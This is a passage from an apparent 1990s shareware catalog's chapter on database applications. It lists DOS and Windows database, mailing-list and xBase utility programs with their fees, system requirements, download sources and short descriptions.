Canadian addresses) (add + $12.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited phone, fax, CompuServe, mail support; all + ASP-wide offers (see page 5). + Look for: availability unknown on BBSs. + SWREG#: 5206 + PsL#: 14006 + Download size: 1734k (about 129 minutes with a 2400 baud modem) + Description: + An easy to use tool with full edit, query, sorting and printing + capabilities. It supports MS Access 1.1 & 2.0 (.MDB), dBase + III&IV, FoxPro 2.0&2.5 (.DBF), Paradox (.DB) and Btrieve + (.DDF&.DAT). Records are displayed in a scrollable grid in + which columns may be moved, resized. It provides QBE, zooming. + Masking for numeric fields. LAN support. Calculated columns and + totals. Reports to printer, to text file and to clipboard. + Remote usage from other Windows applications. + + Chapter 5, "Database applications" 235 + + + + Product: Easy Base + Author: , 01625-614669 + Version: 9.0 (06-10-95) + Needs: IBM PC, DOS 5.0 or better. 1024k RAM; Hard disk. + Registration fee: $49.00 + Registration benefits: printed manual; 31/2" master disk(s); 3 + months of unlimited CompuServe, mail support; all ASP-wide + offers (see page 5). + Look for: availability unknown on BBSs; EB.ZIP on CompuServe in + CIS:PCAPP forum LIBrary 3 (or contact userID 100410,717 for + assistance). + SWREG#: 3043 + PsL#: 11489 + Download size: 984k (about 73 minutes with a 2400 baud modem) + Description: + The first true Rapid Application Development (RAD) system + available on shareware. you can create sophisticated menu + driven data management applications in record time. + + + Product: HouseHold TRACKER + Author: , 714-898-7262 + Version: 1.6 (10-29-93) + Needs: IBM PC, DOS 3.3 or better. Hard disk. + Registration fee: $18.50 (add $2.50 for shipping to U.S. + addresses) (add $2.50 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, fax, CompuServe, mail support; + discounts on other products. + Look for: FMSHT.ZIP on BBSs; FGSHT.ZIP on CompuServe in CIS:PCAPP + forum LIBrary 7 (or contact userID 70233,1315 for assistance). + Download size: 281k (about 21 minutes with a 2400 baud modem) + Special instructions: Product distribution restricted to the + United States. + Description: + Keeps track of many of the items around the house in one + database. Items like household goods (model #'s, serial #'s, + cost, warranties, etc.), auto repairs, VCR tapes, magazine + subscriptions, phone list, utilities and credit cards. The + program will print your list for insurance purposes or make a + label for your VCR tape. Easy to use menus. + + + Product: Infothek (Docuthek) + Document imaging with powerful query system. See full + description on page 209. + + Product: Infothek Information Manager + Information Manager. See full description on page 143. + + Product: MCBase + Relational music collection database system. See full + description on page 525. + + Chapter 5, "Database applications" 236 + + + + Product: Office Supplies Tracker + Office supplies ordering/inventory system. See full + description on page 283. + + Product: Paper Route Ledger + Computer bookkeeping for newspaper carriers. See full + description on page 270. + + Product: RexxBase + The dBase Database For Rexx. See full description on page 400. + + Product: SC-Scripter + SQL server (MS/Sybase) DB script generator. See full + description on page 257. + + Product: Schooner + Author: , 209-299-4950 + Version: 2.50 GUI (03-14-95) + Needs: IBM PC, DOS 3.1 or better. 640k RAM; EGA monitor; Hard + disk. + Strongly recommended: VGA monitor; HP DeskJet printer; HP + LaserJet printer; Mouse; Epson printer. + Registration fee: $39.95 + Registration benefits: 31/2" master disk(s); lifetime unlimited + phone, fax, CompuServe, mail support; royalty-free runtime + license; bonus utilities; bonus data; bonus graphics. + Look for: SCH250.ZIP on BBSs; SCHOON.ZIP on CompuServe in CIS:IBM + forum LIBrary 0 (or contact userID 72672,2502 for assistance). + Download size: 490k (about 37 minutes with a 2400 baud modem) + Description: + A complete software application development system that allows + you to build powerful DOS graphical user interface (GUI) + software applications. dBASE III Plus file compatible and + Clipper '87 compiler compatible code. + + + Product: Search-N-Store + Author: , 309-787-4967-(X227) + Version: 3.4 (06-14-94) + Needs: IBM AT (80286), DOS 2.11 or better. 350k RAM. + Strongly recommended: Hard disk; Mouse; Network (LAN). Disk + cache. + Registration fee: $50.00 (add $5.00 for shipping to Canadian + addresses) (add $5.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited fax, CompuServe, mail + support; all ASP-wide offers (see page 5). + Look for: availability unknown on BBSs. + Download size: 280k (about 21 minutes with a 2400 baud modem) + Description: + A network ready, multi-user or stand alone database with lots + of search and print options. Uses text style graphics. A + database utility is included. + + Chapter 5, "Database applications" 237 + + + + Product: SoundMasterDb + Audio library cataloging program. See full description on + page 564. + + Product: WordLink(TM) + Drag & drop data from database to MSWord docs. See full + description on page 221. + + + 5.2 Flat-file database managers + + See also: Database applications, Mailing list systems. + + Product: Book Librarian + Book cataloging program. See full description on page 459. + + Product: Calling Cards + Combination Rolodex - Yellow Pages program. See full + description on page 131. + + Product: DATA MASTER + Author: , 703-534-1726 + Version: 3.1 (11-24-93) + Needs: IBM PC, DOS 3.1 or better. 512k RAM; CGA monitor; Hard + disk. + Registration fee: $39.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, BBS, CompuServe, + mail support; lifetime return policy; royalty-free runtime + license; LAN license; all ASP-wide offers (see page 5); + discounts on other products; discounts on upgrades. 12-month + free upgrading allowed. 1 free update disk(s) sent out. + Look for: DM31.ZIP on BBSs (call 703-534-7812 to download it at + no charge); DM31.ZIP on CompuServe in CIS:PCAPP forum LIBrary 3 + (or contact userID 72357,2034 for assistance). + SWREG#: 367 + Download size: 350k (about 26 minutes with a 2400 baud modem) + Description: + Complete dbase database management program. Create, modify, and + sort standard dbase files. Contains report writer, form letter + utility, mailing label utility, duplicate checker, statistical + analysis, time period analysis, weights & measures conversion, + etc. Converts from dbase to Lotus 1-2-3, and vice versa. Much + more. + + Chapter 5, "Database applications" 238 + + + + Product: FILE EXPRESS + Author: , 206-788-0932 + Version: 5.1 (12-10-93) + Needs: IBM PC, DOS 2.0 or better. 512k RAM; CGA monitor; Dual + 720k floppy drives. + Strongly recommended: Hard disk. + Registration fee: $99.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $23.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited phone, fax, BBS, + CompuServe, mail support; 2-month return policy; bonus + templates; discounts on upgrades. 1-month free upgrading + allowed. + Look for: FE51*.ZIP on BBSs (multiple files) (call 206-788-4008 + to download it at no charge); FE51*.ZIP on CompuServe in + CIS:PCAPP forum LIBrary 3 (multiple files) (or contact userID + 75226,2020 for assistance). + Download size: 1300k (about 97 minutes with a 2400 baud modem) + Description: + An easy to use flat file database manager with relational + lookup and update capabilities. Handles over 2 billion records + per database, 200 fields per record, 1000 characters per field + and 4000 characters per record. Includes extensive searching, + reporting, label printing, importing, exporting and duplicate + searching. Database formats can be changed at any time without + losing data. Formula handler includes over 60 string and + numeric functions. Includes an auto-dialer. Supports 300+ + printers. + + + Product: HOLD-ANYTHING! + Keeps track of any kind of data very easily! See full + description on page 243. + + Product: Household Register + Home/office inventory program. See full description on + page 525. + + Product: LABEL MASTER + Mailing list manager - PC Mag editors choice. See full + description on page 241. + + Product: Layout + Office layout and equipment inventory. See full description on + page 290. + + Chapter 5, "Database applications" 239 + + + + Product: Little Lists + Author: + Version: 3.2 (07-28-95) + Needs: IBM PC, DOS 2.11 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Hard disk. + Registration fee: $15.00 (add $3.00 for shipping to Canadian + addresses) (add $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of fax, CompuServe, mail support; + discounts on other products; discounts on upgrades. + Look for: LLIST32.ZIP on BBSs; LITTLE.ZIP on CompuServe in + CIS:PCVENK forum LIBrary 9 (or contact userID 74774,403 for + assistance). + PsL#: 10938 + Download size: 200k (about 15 minutes with a 2400 baud modem) + Description: + Database program for users who want to keep things simple. + Create exactly the list you want, without prior knowledge of + programming or database systems. Add, view, change records, + browse through the list, print reports & labels including only + the fields you want, sort the records any way you like, perform + simple math, add & change fields, import/export ASCII and DBF + files. + + + Product: MicroPlayerCD(tm) + Play audio CDs on your computer's CDROM drive. See full + description on page 75. + + Product: NAMEBASE + Name/address/notes database w/mouse support. See full + description on page 306. + + Chapter 5, "Database applications" 240 + + + + Product: q&dBase for Windows + Author: , 201-635-1824 + Version: 2.0a (10-23-94) + Needs: IBM 80386, Windows 3.1 or better. Hard disk; + VBRUN300.DLL. + Strongly recommended: Mouse. + Registration fee: $27.50 (add $3.95 for shipping to U.S. + addresses) (add $3.95 for shipping to Canadian addresses) (add + $4.95 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; lifetime + unlimited phone, CompuServe support; all ASP-wide offers (see + page 5). Lifetime free upgrading allowed. + Look for: QDBW.ZIP on BBSs (call 201-886-8048 to download it at + no charge); QDBW.ZIP on CompuServe in CIS:PCAPP forum LIBrary 7 + (or contact userID 76336,3271 for assistance). + SWREG#: 3598 + PsL#: 11656 + Download size: 660k (about 49 minutes with a 2400 baud modem) + Description: + The only shareware program that allows you to create and define + your own databases, design your own data entry forms, create + and store report queries, design report layouts, and store all + data in MS-Access 2.0 format for easy portability. Includes + print preview feature and on-line context sensitive Windows + help system. + + + Product: RMS-III: Ref.Mgn.Sys. + Menu based biblio/reference system. See full description on + page 207. + + Product: Video Librarian + Video library cataloging program. See full description on + page 557. + + + 5.3 Mailing list systems + + See also: Database applications, Flat-file database managers; + Utilities, Printer utilities, Envelope addressers. + + Product: APT Mailing Assistant + Print envelopes/labels/bulk mail with POSTNET. See full + description on page 83. + + Product: FILE EXPRESS + Powerful, easy DBMS with relational features. See full + description on page 237. + + Product: FundRaiser Basic + Donor management software for nonprofits. See full description + on page 314. + + Chapter 5, "Database applications" 241 + + + + Product: Infothek Information Manager + Information Manager. See full description on page 143. + + Product: LABEL MASTER + Author: , 703-534-1726 + Version: 5.1c (11-24-93) + Needs: IBM PC, DOS 2.1 or better. 512k RAM; CGA monitor; Hard + disk; HP LaserJet printer; Epson printer. + Strongly recommended: Hercules monitor. + Registration fee: $39.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, BBS, CompuServe, + mail support; lifetime return policy; royalty-free runtime + license; LAN license; all ASP-wide offers (see page 5); disks + of other shareware; discounts on other products. 12-month free + upgrading allowed. 1 free update disk(s) sent out. + Look for: LM51C.ZIP on BBSs (call 703-534-7812 to download it at + no charge); LM51C.ZIP on CompuServe in CIS:PCAPP forum LIBrary + 9 (or contact userID 72357,2034 for assistance). + SWREG#: 366 + Download size: 350k (about 26 minutes with a 2400 baud modem) + Description: + A complete mailing list management program which received PC + Magazine's editors choice award. Includes barcoding and ZIP- + PLUS-4 conversion. Maintains an unlimited number of names and + addresses, automatically maintains name, zip code, and company + name sorting, prints labels of any size, supports all dot + matrix and laserjet printers, includes a form letter utility, a + superb report writer, duplicate checking, search and replace on + any field, and much more. + + + Product: Little Lists + Easy-to-use database system. See full description on page 238. + + Product: NAMEBASE + Name/address/notes database w/mouse support. See full + description on page 306. + + Product: OMS (Organizational Mgmt System + Management system for non-profit orgs. See full description on + page 321. + + Chapter 5, "Database applications" 242 + + + + Product: Plain Vanilla Labels + Author: , 416-284-6119 + Version: 3.15 (01-10-93) + Needs: IBM PC, DOS 2.11 or better. + Registration fee: $15.00 + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, CompuServe, mail support; lifetime + limited return policy; runtime license; all ASP-wide offers + (see page 5); disks of other shareware. + Look for: PVL316.ZIP on BBSs; PV316.ZIP on CompuServe in + CIS:PCAPP forum LIBrary 10 (or contact userID 70461,2507 for + assistance). + Download size: 93k (about seven minutes with a 2400 baud modem) + Description: + An easy-to-use label program which uses standard 31/2" by 15/16" + tractor feed labels. Labels can be stored in up to 10 files, or + a label can be printed without saving the data. Each label file + can have its own set of macros to make data entry easier. Data + can be indexed at any point in each label. Remarks can be + "hidden" in any part of the label so that they can be seen by + the user but not printed on the label. Has a sophisticated + search function. + + + Product: PostCardMaster + Author: , 816-429-3558 + Version: 4.20 (09-01-94) + Needs: IBM PC, DOS 2.1 or better. 330k RAM; CGA monitor; + Hercules monitor. IBM Graphics printer. + Strongly recommended: Hard disk; HP LaserJet printer; Mouse. + Registration fee: $25.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); 51/4" master disk(s); + lifetime unlimited phone, fax, BBS, CompuServe, mail support; + all ASP-wide offers (see page 5); disks of other shareware; + discounts on other products. Lifetime free upgrading allowed. + 99 free update disk(s) sent out. + Look for: PCM420.ZIP on BBSs (call 317-784-2147 to download it at + no charge); PCMSTR.ZIP on CompuServe in CIS:PCAPP forum LIBrary + 9 (or contact userID 70272,3317 for assistance). + SWREG#: 80 + Download size: 250k (about 19 minutes with a 2400 baud modem) + Description: + Designed to help uUsers compose post cards and maintain + addresses. The address feature has entries for name, + salutation, code, 3 line address and a line for zipcode, + telephone number, and a remarks line. Printouts include + listings of the addresses, address labels, 3X5 cards, 8 types/ + sizes of post cards or Rolodex cards and response cards that + pre-print a response from the addressee to mail to the + originator. Post cards cost 1/3 less than a letter and in some + cases are equally as good ie meetings. + + Chapter 5, "Database applications" 243 + + + + Product: PrintEnvelope + Complete mail addressing system for Windows. See full + description on page 84. + + Product: Public Address + Author: , 206-866-3781 + Version: 3.1 (10-05-94) + Needs: IBM PC, DOS 3.3 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Hard disk; HP LaserJet printer; Epson + printer. + Registration fee: $20.00 (add $3.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $7.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); 51/4" + master disk(s); 3 months of unlimited phone, CompuServe, mail + support; all ASP-wide offers (see page 5); disks of other + shareware; discounts on upgrades. 3 free update disk(s) sent + out. + Look for: PA310.ZIP on BBSs; PUBADD.ZIP on CompuServe in + CIS:PCAPP forum LIBrary 9 (or contact userID 70322,231 for + assistance). + Download size: 154k (about twelve minutes with a 2400 baud modem) + Description: + Full featured address manager. Prints pre-defined labels and + enevlopes for dot-matrix or laser printers. Searches on most + feilds. Unlimited records, and groups. Supports international + addresses and character set. Dynamic menus allow you to change + the menus to your native language. No more waisted laser labels + because you can start printing from anywhere on a sheet. + Supports up to six return address for envelopes. + + + Product: Simply Labels + Free form label program with many features. See full + description on page 79. + + Product: ZIPKEY + TSR Zip Code & area code keyboard enhancement. See full + description on page 260. + + + 5.4 Freeform/text database managers + + Product: BusinessCards for Windows + Free form database for Windows. See full description on + page 138. + + Chapter 5, "Database applications" 244 + + + + Product: HOLD-ANYTHING! + Author: + Version: 1.1 (02-21-93) + Needs: IBM PC, DOS 2.1 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Modem. + Registration fee: $19.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of CompuServe, mail support; disks of other shareware. + Look for: HOLD11.ZIP on BBSs; HOLD11.ZIP on CompuServe in + CIS:PCUTIL forum LIBrary 7 (or contact userID 70640,1614 for + assistance). + Download size: 90k (about seven minutes with a 2400 baud modem) + Description: + An extremely easy to use program which keeps track of any kind + of data! No database setup required - just start entering your + data. A great multi-purpose database program with a slick + interface. A mouse is fully supported. Records are quickly + located by typing the first few letters of an item's name, or + by picking from a list. Holds multiple categories of data. + You'll think of new uses for it all the time, e.g. notes, time + tracking, hobby collections, log book, address book, inventory, + etc. + + + Product: Plain Vanilla Labels + Simple but complete label printer. See full description on + page 241. + + Product: RACONTEX + Author: + Version: 3.23 (11-20-93) + Needs: IBM PC, DOS 3.2 or better. VBRUN300.DLL (if used under + Windows). + Strongly recommended: Hard disk. + Registration fee: $99.95 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of CompuServe, mail support; all ASP- + wide offers (see page 5). 3-month free upgrading allowed. + Look for: RACONTEX.ZIP on BBSs (multiple files) (call + 604-736-3453 to download it at no charge); RACONT.ZIP on + CompuServe in CIS:PCAPP forum LIBrary 7 (or contact userID + 71750,1036 for assistance). + SWREG#: 92 + Download size: 230k (about 17 minutes with a 2400 baud modem) + Description: + Competition for FolioViews, AskSam, Zyindex and the STAIRS + mainframe product. This indexing text search and retrieval + system is useful for legal transcript, statutes (laws), + manuals, etc. Ideal to produce on-line manuals for software. + + Chapter 5, "Database applications" 245 + + + + Includes word proximity search features. Because it pages in + its indexes and files, Racontex works well over a local area + network since it does not have to read the whole file to do a + search. Includes a windows front end for DOSophobes! + + + Product: Recon + Full management of CompuServe message files. See full + description on page 373. + + + 5.5 Database utilities + + Product: Bigsort + Author: + Version: 1.02 (10-01-93) + Needs: IBM PC, DOS 3.3 or better. 384k RAM; Hard disk. + Registration fee: $20.00 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited mail support; 3-month + limited return policy. + Look for: BSORT102.ZIP on BBSs. + Download size: 32k (about three minutes with a 2400 baud modem) + Description: + A fast, general purpose sorting utility for massive amounts of + data. Handles various record formats, including fixed length, + variable length, dBASE, and comma delimited records. The + sorting keys can be customized to contain up to 8 fields, each + with independent length, byte ordering, and case sensitivity + fields. Up to 8 input files can be used with a single output + file. Files can be up to 2GB, and each record can be up to + 64KB. Compare this to DOS sort! + + + Product: DATA MASTER + Database management program. See full description on page 237. + + Chapter 5, "Database applications" 246 + + + + Product: EMERI + Author: , 401-767-3106 + Version: 1.3 (05-01-93) + Needs: IBM PC, Windows 3.0 or better. 128k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Registration fee: $16.95 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: 12 months of unlimited phone, fax, BBS, + CompuServe, GEnie, newsletter, mail support; 1-month return + policy; all ASP-wide offers (see page 5); discounts on other + products. + Look for: EMERI13.ZIP on BBSs (call 401-767-3931 to download it + at no charge); EMERI1.ZIP on CompuServe in CIS:RISS forum + LIBrary 5 (or contact userID 72662,463 for assistance). + Download size: 120k (about nine minutes with a 2400 baud modem) + Description: + The CardFile program that comes free with Microsoft Windows is + a truly handy little "Applet" for managing phone numbers and + addresses, etc. Unfortunately, for those of us who bounce in + and out of Windows, Murphy's Law dictates that we'll be staring + at a DOS prompt when we need quick access to our Cardfiles! + This DOS-based program browses Windows Cardfiles. Optimized + for quick, easy "hits" on the card you're looking for. Offers + partially qualified searches, and more! + + + Product: Little Lists + Easy-to-use database system. See full description on page 238. + + Product: PCFDial + Powerful 7k TSR voice/fax screen autodialer. See full + description on page 130. + + Product: PopDBF + 4k TSR for "instant access to X-Base files" See full + description on page 248. + + Product: q&dBase for Windows + Database creation and maintenance program. See full + description on page 239. + + Product: Recap + Fix capitalization in dBase-compatible files. See full + description on page 248. + + Product: SC-Scripter + SQL server (MS/Sybase) DB script generator. See full + description on page 257. + + Product: SuperDIR + DIR util, incl/excl masks, DB output, src av. See full + description on page 26. + + Chapter 5, "Database applications" 247 + + + + Product: ZIPKEY + TSR Zip Code & area code keyboard enhancement. See full + description on page 260. + + 5.5.1 File format translators + + See also: Utilities, File utilities, File sorting & conversion. + + Product: Extract It + Report data extractor. See full description on page 52. + + Product: WinBrowse + Author: , 201-635-1824 + Version: 1.6a (04-17-95) + Needs: IBM 80386, Windows 3.1 or better. 4000k RAM; VGA monitor; + Hard disk; Mouse; VBRUN300.DLL. + Registration fee: $22.50 (add $3.95 for shipping to U.S. + addresses) (add $4.95 for shipping to Canadian addresses) (add + $4.95 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; lifetime + unlimited phone, CompuServe, mail support; all ASP-wide offers + (see page 5). Lifetime free upgrading allowed. + Look for: WINBRS16.ZIP on BBSs; WINBRS.ZIP on CompuServe in + CIS:WINAPD forum LIBrary 1 (or contact userID 76336,3271 for + assistance). + SWREG#: 4307 + PsL#: 11861 + Download size: 1140k (about 85 minutes with a 2400 baud modem) + Description: + A multiple PC database utility which allows browsing, editing, + and reporting of data using any of several different popular PC + database formats. dBase III+, dBase IV, FoxPro 2.0, 2.5, 2.6, + Paradox 3.x, 4.x, and Access 2.0 formats supported. Even lets + you transfer data from one format to another! Create sorts and + filters on any or all fields using any supported format. + + + 5.6 Software tools & add-ins + + See also: Computer programming, Languages; Computer + programming, Software tools & add-ins. + + 5.6.1 For multiple programs + + Product: 4Print/4Book DOS + Paper saving utility for LaserJets & DeskJets. See full + description on page 89. + + Product: 4Print/4Book Windows + 4Print/4Book DOS + 4PrinW Windows interface. See full + description on page 89. + + Chapter 5, "Database applications" 248 + + + + Product: EXTENDED BATCH LANGUAGE-PLUS! + The real batch language you wish DOS had. See full description + on page 102. + + Product: PopDBF + Author: , 309-673-9886 + Version: 4.05 (07-29-92) + Needs: IBM PC, DOS 3.0 or better. 4k RAM. + Registration fee: $35.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: 3 months of phone, fax, CompuServe, mail + support; 2-month limited return policy. + Look for: POPDBF??.ZIP on BBSs (call 414-789-4210 to download it + at no charge); POPDBF.ZIP on CompuServe in CIS:PCAPP forum + LIBrary 3 (or contact userID 76665,736 for assistance). + Download size: 130k (about ten minutes with a 2400 baud modem) + Description: + A 4K TSR that provides "Instant Access to X-Base Files". Here + are just a few of its features: + * Easily select ANY database, any drive + * Append, browse, delete, and edit records + * Delete, pack and zap databases + * Lightning fast search of entire record or selected + field(s) + * View structure + * Print structure or records (browse or edit format) to a + printer or file + * View index expressions (.IDX, .NDX, .NTX) + * Network Compatible + * Context sensitive help + + + Product: QUIK-INSTALL + 7k application install program! Many features. See full + description on page 429. + + Product: Recap + Author: + Version: 5.1 (08-14-95) + Needs: IBM PC, DOS 2.11 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. dBase-compatible data file. + Strongly recommended: Hard disk. + Registration fee: $0.00 + Registration benefits: + Look for: RECAP51.ZIP on BBSs; RECAP.ZIP on CompuServe in + CIS:PCVENK forum LIBrary 9 (or contact userID 74774,403 for + assistance). + Download size: 145k (about eleven minutes with a 2400 baud modem) + Description: + It can be very frustrating to find that some of your database + records have been entered in all caps when you didn't want them + that way, or that some have not been entered in all caps when + + Chapter 5, "Database applications" 249 + + + + you did want them that way! Goes through any dBase-III + compatible database file and make the desired adjustments. Can + save you from hours of re-entering data. + + + Product: Simstat + Complete statistics and simulation program. See full + description on page 395. + + Product: WinBrowse + Multiple PC database utility program. See full description on + page 247. + + 5.6.2 For dBASE + + Product: DATABASE BROWSER + Browser with editing, query, sorting and more. See full + description on page 234. + + Product: DBKIT + Author: , 604-433-5189 + Version: 2.5 (03-01-94) + Needs: IBM PC, DOS 3.1 or better. 521k RAM; Hard disk. + Registration fee: $0.00 + Registration benefits: 3 months of unlimited mail support; all + ASP-wide offers (see page 5). + Look for: DB**.ZIP on BBSs (multiple files). + Download size: 800k (about 60 minutes with a 2400 baud modem) + Description: + Provides a wide range of maintenance, development, monitoring, + and management tasks without an interpreter. Command line + orientation. Includes teleshare gather remote & local file + management & remote support. + + + Product: dVERSION + Author: , 616-281-3333 + Version: 2.0 (09-05-93) + Needs: IBM 80386, DOS 3.3 or better. 512k RAM. + Registration fee: $55.00 (add $15.00 for shipping to U.S. + addresses) + Registration benefits: printed manual; 31/2" master disk(s); 3 + months of tollfree 800# phone, CompuServe, mail support; + royalty-free source code; discounts on other products. + Look for: availability unknown on BBSs; DVER.ZIP on CompuServe in + CIS:FOXUSE forum LIBrary 5 (or contact userID 73304,1222 for + assistance). + Download size: 67k (about five minutes with a 2400 baud modem) + Description: + Conditionally translates xBASE code. Lets the programmer have + many versions of an application in one set of source code. + + Chapter 5, "Database applications" 250 + + + + Product: WordLink(TM) + Drag & drop data from database to MSWord docs. See full + description on page 221. + + Product: Workbase + Author: + Version: 4.3 (05-15-95) + Needs: IBM PC, DOS 2.11 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Hard disk. Some knowledge of Xbase + commands and functions. + Registration fee: $49.00 (add $3.00 for shipping to Canadian + addresses) (add $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of fax, CompuServe, mail support; + discounts on upgrades. + Look for: WORK43.ZIP on BBSs; WORK.ZIP on CompuServe in + CIS:PCVENK forum LIBrary 9 (or contact userID 74774,403 for + assistance). + PsL#: 10251 + Download size: 235k (about 18 minutes with a 2400 baud modem) + Awards & nominations: 1990 winner, Public Brand Software + contests for useful programs. + Description: + Xbase developers: this is an interactive environment for over + 200 Xbase commands and functions, including some that may be + new to you. Create, append, edit, browse, restore from and save + to MEM files, display memory, display structure, modify + structure - many other commands for development, + troubleshooting and support. Includes rudimentary PRG + interpreter. If your applications use dBase-compatible files, + you'll love this handy utility. Unlike other "dot prompt" + programs, this one works! + + + 5.6.2.1 dBASE III specific + + Product: dPerfect Merge + Converts xBase to WordPerfect secondary file. See full + description on page 51. + + Product: RexxBase + The dBase Database For Rexx. See full description on page 400. + + Chapter 5, "Database applications" 251 + + + + 5.6.3 For FoxPro/FoxBASE+ + + Product: Data Wire Four + Author: , 616-281-3333 + Version: 1.4.1 (07-20-95) + Needs: IBM 80386, DOS 3.3 or better. 512k RAM; Hard disk. + Foxpro Runtime Unit. + Strongly recommended: EGA monitor; Mouse. + Registration fee: $25.00 (add $15.00 for shipping to U.S. + addresses) + Registration benefits: printed manual; 31/2" master disk(s); 3 + months of tollfree 800# phone, CompuServe, mail support; + royalty-free source code; discounts on other products. + Look for: availability unknown on BBSs; DW4.ZIP on CompuServe in + CIS:FOXUSE forum LIBrary 5 (or contact userID 73304,1222 for + assistance). + Download size: 17k (about two minutes with a 2400 baud modem) + Description: + A Foxpro procedure designed to allow an application to verify + databases quickly and easily. In essense, the programmer + executes DW4, generating a data dictionary program. It has a + 'picture' of all databases in the current directory. When + executed, it verifies that all specified databases exist and + have the correct field layouts. Structural indices are also + verified. The generated program can execute alone or within a + Foxpro application. + + + Product: DATABASE BROWSER + Browser with editing, query, sorting and more. See full + description on page 234. + + Product: DBKIT + Xbase programming & maintenance. See full description on + page 249. + + Chapter 5, "Database applications" 252 + + + + Product: dMAIL4 + Author: , 616-281-3333 + Version: 4.0.1 (07-20-95) + Needs: IBM 80386, DOS 3.3 or better. 512k RAM; Hard disk. + Foxpro Runtime Unit. + Strongly recommended: EGA monitor; Mouse. + Registration fee: $75.00 (add $15.00 for shipping to U.S. + addresses) + Registration benefits: printed manual; 31/2" master disk(s); 3 + months of tollfree 800# phone, CompuServe, mail support; + royalty-free source code; discounts on other products. + Look for: availability unknown on BBSs; DMAIL4.ZIP on CompuServe + in CIS:FOXUSE forum LIBrary 5 (or contact userID 73304,1222 for + assistance). + Download size: 434k (about 32 minutes with a 2400 baud modem) + Description: + A Foxpro application designed to record and track a simple + mailing list database. Among its features is the ability to + run in a network environment. Can access customer records by a + variety of indices. Records can be imported and exported to a + variety of file formats. + + + Product: dPerfect Merge + Converts xBase to WordPerfect secondary file. See full + description on page 51. + + Product: Hard Wire Four + Author: , 616-281-3333 + Version: 2.8.1 (07-20-95) + Needs: IBM 80386, DOS 3.3 or better. 512k RAM; Hard disk. + Foxpro Runtime Unit. + Strongly recommended: EGA monitor; Mouse. + Registration fee: $45.00 (add $15.00 for shipping to U.S. + addresses) + Registration benefits: printed manual; 31/2" master disk(s); 3 + months of tollfree 800# phone, CompuServe, mail support; + royalty-free source code; discounts on other products. + Look for: availability unknown on BBSs; HW4.ZIP on CompuServe in + CIS:FOXUSE forum LIBrary 5 (or contact userID 73304,1222 for + assistance). + Download size: 77k (about six minutes with a 2400 baud modem) + Description: + A set of procedures to give the programmer a means to create an + application quickly and easily. In essense, the programmer + creates a data dictionary. This database defines all + parameters to create and maintain the files with an + application. An edit procedure, often called the 'little black + box', then can be used to perform the actual file maintenance. + + Chapter 5, "Database applications" 253 + + + + Product: SAC DATABASE + Author: , 616-281-3333 + Version: 2.7.2 (07-20-95) + Needs: IBM 80386, DOS 3.3 or better. 512k RAM; Hard disk. + Foxpro Runtime Unit. + Strongly recommended: EGA monitor; Mouse. + Registration fee: $75.00 (add $15.00 for shipping to U.S. + addresses) + Registration benefits: printed manual; 31/2" master disk(s); 3 + months of tollfree 800# phone, CompuServe, mail support; + royalty-free source code; bonus graphics; discounts on other + products. + Look for: availability unknown on BBSs; SAC.ZIP on CompuServe in + CIS:ASTROFORUM forum LIBrary 5 (or contact userID 73304,1222 + for assistance). + Download size: 865k (about 64 minutes with a 2400 baud modem) + Description: + A Foxpro application designed to record and track the Saguaro + Astronomy Club database. This database includes deep-sky and + double star objects. Among its features is its ability to + access records by a variety of indices (including notes). It + will also let you keep user logs on various objects. + + + Product: Shell + Author: , 616-281-3333 + Version: 1.2.3 (07-20-95) + Needs: IBM 80386, DOS 3.3 or better. 512k RAM; Hard disk. + Foxpro Runtime Unit. + Strongly recommended: EGA monitor; Mouse. + Registration fee: $45.00 (add $15.00 for shipping to U.S. + addresses) + Registration benefits: printed manual; 31/2" master disk(s); 3 + months of tollfree 800# 